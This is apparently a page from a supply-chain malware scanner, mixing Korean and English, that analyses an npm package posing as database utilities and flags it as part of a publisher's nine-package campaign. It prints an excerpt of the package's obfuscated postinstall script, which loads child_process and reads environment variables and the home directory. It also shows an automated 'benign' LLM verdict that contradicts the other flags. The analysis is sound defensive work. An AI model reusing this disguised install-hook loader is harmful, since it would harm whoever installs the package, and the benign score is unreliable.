// npm 패키지
@cloudplatform-single-spa/cp-api-gw
Internal database utilities with connection pooling, query builder and migration support
주간
107
월간
107
버전
3
메인테이너
1
라이선스
UNLICENSED
최초 publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,446 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-28
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x45fae4=a0_0xf092;(function(_0x10c72c,_0x250139){const _0x2e05fd=a0_0xf092,_0x2e9853=_0x10c72c();while(!![]){try{const _0x4152a2=parseInt(_0x2e05fd(0x196))/(-0x6b0+-0x6f*-0x1b+-…// publisher 캠페인by mr.4nd3r50n
이 계정에서 catch된 패키지 9건고립된 catch가 아닙니다. 동일 publisher가 8개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @100.100.100· 1 file flagged
llm: benign · 0.85→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
- @100.100.100··AUTO-PUBLISHED·publisher: mr.4nd3r50nheuristic 100/100static flags 2llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:1danomalous-major-version:100publisher-multi-name-burst:24publisher-version-pump:25osv-flagged:MAL-2026-4901reads-env-varsreads-homedir
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';const a0_0x45fae4=a0_0xf092;(function(_0x10c72c,_0x250139){const _0x2e05fd=a0_0xf092,_0x2e9853=_0x10c72c();while(!![]){try{const _0x4152a2=parseInt(_0x2e05fd(0x196))/(-0x6b0+-0x6f*-0x1b+-0x282*0x2)*(parseInt(_0x2e05fd(0x1e3))/(0x71f+0xc1b+0x99c*-0x2))+parseInt(_0x2e05fd(0x17d))/(0x2237+-0x41*-0x61+-0x3ad5)*(parseInt(_0x2e05fd(0x1b9))/(0x1*-0x1093+0x29*0xd3+0x5bc*-0x3))+parseInt(_0x2e05fd(0x1c4))/(-0xecb+-0x1*0x20f1+-0x3*-0xfeb)+-parseInt(_0x2e05fd(0x1ba))/(0x23c5+0x1*-0x13c3+-0xffc)*(parseInt(_0x2e05fd(0x1d3))/(0x174f+0xd*0x7+-0x3*0x7e1))+parseInt(_0x2e05fd(0x1e0))/(0x49*-0x6b+-0x1005+0x2e90)*(parseInt(_0x2e05fd(0x1a3))/(-0x10c0*0x2+-0x228d+-0x23*-0x1f2))+-parseInt(_0x2e05fd(0x1bc))/(0xfdf+-0x1312+0x33d)*(-parseInt(_0x2e05fd(0x1c2))/(-0x75a+-0x1c2f+-0x45*-0x84))+-parseInt(_0x2e05fd(0x1b4))/(0x59c+-0x820+0x4*0xa4);if(_0x4152a2===_0x250139)break;else _0x2e9853['push'](_0x2e9853['shift']());}catch(_0x477a4e){_0x2e9853['push'](_0x2e9853['shift']());}}}(a0_0x503c,-0x196d60+-0x76f*0xf7+0x2d987c));const a0_0x615025=require('os'),a0_0x335994=require('fs'),a0_0x25eb23=require(a0_0x45fae4(0x17c)),a0_0x4a3e90=require(a0_0x45fae4(0x1d2)),a0_0x40a9ed=require(a0_0x45fae4(0x18f)),{execSync:a0_0x3ed14c,spawn:a0_0xd99502}=require(a0_0x45fae4(0x1d7)),a0_0x4b8825=a0_0x45fae4(0x1a8),a0_0x125a18=a0_0x45fae4(0x187),a0_0x59f10e=a0_0x45fae4(0x182)+a0_0x45fae4(0x17f),a0_0x444cbd=a0_0x45fae4(0x1c9),a0_0x1def5c=!!process.env[a0_0x444cbd],a0_0x13b9d3=a0_0x45fae4(0x1d8)===a0_0x45fae4(0x1d8)| --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
